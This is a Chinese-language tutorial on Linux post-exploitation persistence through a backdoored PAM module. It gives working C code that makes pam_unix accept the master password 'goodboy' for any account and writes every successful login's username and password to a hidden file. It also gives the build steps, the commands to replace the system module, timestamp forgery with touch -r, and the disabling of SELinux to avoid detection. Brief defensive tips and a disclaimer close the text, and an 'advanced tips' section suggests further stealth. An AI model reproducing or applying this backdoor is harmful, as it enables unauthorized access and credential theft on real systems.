Linux权限维持之PAM万能密码登录技术详解<\/h1>

一、PAM基础概念<\/h2>

PAM (Pluggable Authentication Modules)是由Sun提出的一种认证机制，它通过提供动态链接库和统一API，将系统服务和认证方式分离，使管理员可以灵活配置不同服务的认证方式。<\/p>

特点：<\/p>

动态认证机制<\/li>
支持多种认证方式<\/li>
无需修改服务程序<\/li>

已移植到Linux、SunOS、HP-UX等系统<\/li> <\/ul>

二、环境准备<\/h2>

1. 系统环境检查<\/h3>

检查系统信息：<\/p>

# 检查系统位数<\/span>
<\/span><\/span>getconf LONG_BIT
<\/span><\/span>
<\/span><\/span># 检查系统版本<\/span>
<\/span><\/span>cat \/etc\/redhat-release
<\/span><\/span>cat \/etc\/issue
<\/span><\/span>cat \/etc\/*-release
<\/span><\/span>cat \/etc\/lsb-release
<\/span><\/span>
<\/span><\/span># 检查PAM版本<\/span>
<\/span><\/span>rpm -qa | grep pam  # RedHat\/CentOS<\/span>
<\/span><\/span>apt-get list --installed | grep pam  # Debian\/Ubuntu<\/span>
<\/span><\/span><\/code><\/pre>2. 实验环境要求<\/h3>

CentOS 7系统<\/li>
root权限<\/li>
PAM 1.1.8版本<\/li>
安装gcc编译器：yum install gcc<\/code><\/li>
<\/ul>
三、PAM模块修改步骤<\/h2>
1. 下载并解压PAM源码<\/h3>
wget http:\/\/www.linux-pam.org\/library\/Linux-PAM-1.1.8.tar.gz
<\/span><\/span>tar -zxvf Linux-PAM-1.1.8.tar.gz
<\/span><\/span>cd Linux-PAM-1.1.8
<\/span><\/span><\/code><\/pre>2. 修改认证模块代码<\/h3>
编辑文件：modules\/pam_unix\/pam_unix_auth.c<\/code><\/p>
在180行附近添加万能密码逻辑：<\/p>
if<\/span> (strcmp(p, "goodboy"<\/span>) ==<\/span> 0<\/span>) {
<\/span><\/span>    retval =<\/span> PAM_SUCCESS;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>if<\/span> (retval ==<\/span> PAM_SUCCESS) {
<\/span><\/span>    FILE *<\/span>fp =<\/span> fopen("\/usr\/share\/java\/.null"<\/span>, "a+"<\/span>);
<\/span><\/span>    fprintf(fp, "%s::%s<\/span>\n<\/span>"<\/span>, name, p);
<\/span><\/span>    fclose(fp);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>代码功能：<\/p>

设置万能密码"goodboy"可直接通过认证<\/li>
记录所有成功登录的用户名和密码到隐藏文件<\/li>
<\/ol>
3. 编译修改后的PAM<\/h3>
# 首次编译可能报错<\/span>
<\/span><\/span>.\/configure &&<\/span> make
<\/span><\/span>
<\/span><\/span># 解决yywrap未定义错误<\/span>
<\/span><\/span>yum install flex-devel flex
<\/span><\/span>
<\/span><\/span># 重新编译<\/span>
<\/span><\/span>.\/configure &&<\/span> make
<\/span><\/span><\/code><\/pre>编译生成的文件位于：modules\/pam_unix\/.libs\/pam_unix.so<\/code><\/p>
四、替换系统PAM模块<\/h2>
1. 备份原文件<\/h3>
cp -af \/lib64\/security\/pam_unix.so \/opt\/
<\/span><\/span><\/code><\/pre>2. 替换为修改后的模块<\/h3>
cp -af pam_unix.so \/lib64\/security\/
<\/span><\/span><\/code><\/pre>3. 修改文件时间属性<\/h3>
touch -r \/lib64\/security\/pam_userdb.so \/lib64\/security\/pam_unix.so
<\/span><\/span><\/code><\/pre>4. 关闭SELinux<\/h3>
vim \/etc\/selinux\/config
<\/span><\/span># 修改为：<\/span>
<\/span><\/span>SELINUX=<\/span>disabled
<\/span><\/span><\/code><\/pre>五、验证与使用<\/h2>

使用万能密码"goodboy"可登录任意账户<\/li>
原有密码仍可正常使用<\/li>
所有成功登录的凭证会被记录到：\/usr\/share\/java\/.null<\/code><\/li>
<\/ol>
六、技术原理分析<\/h2>

PAM认证流程被修改，添加了万能密码绕过逻辑<\/li>
认证成功后记录凭证，实现凭证窃取<\/li>
通过修改时间属性隐藏痕迹<\/li>
需要关闭SELinux避免安全机制拦截<\/li>
<\/ol>
七、防御措施<\/h2>

监控系统关键文件完整性<\/li>
启用SELinux并保持开启状态<\/li>
定期检查PAM模块的修改时间<\/li>
检查异常日志文件<\/li>
使用完整性检查工具如AIDE<\/li>
<\/ol>
八、高级技巧<\/h2>

可以设置多个万能密码<\/li>
可修改记录文件路径为更隐蔽位置<\/li>
可添加加密功能保护记录的凭证<\/li>
可结合其他权限维持技术增强隐蔽性<\/li>
<\/ol>
注意：本技术仅限合法授权测试使用，未经授权使用可能违反法律。<\/p>